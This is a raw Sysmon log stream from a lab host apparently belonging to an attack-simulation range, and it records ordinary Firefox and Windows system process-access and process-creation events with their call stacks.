13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921|C:\Program Files\Mozilla Firefox\xul.dll+2342d8 10341000x800000000000000016773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.13.2118973481\1658541064" -childID 2 -isForBrowser -prefsHandle 1812 -prefMapHandle 2868 -prefsLen 1386 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 2924 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.349{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000016762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000016761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000016760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000016759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000016758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.317{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla 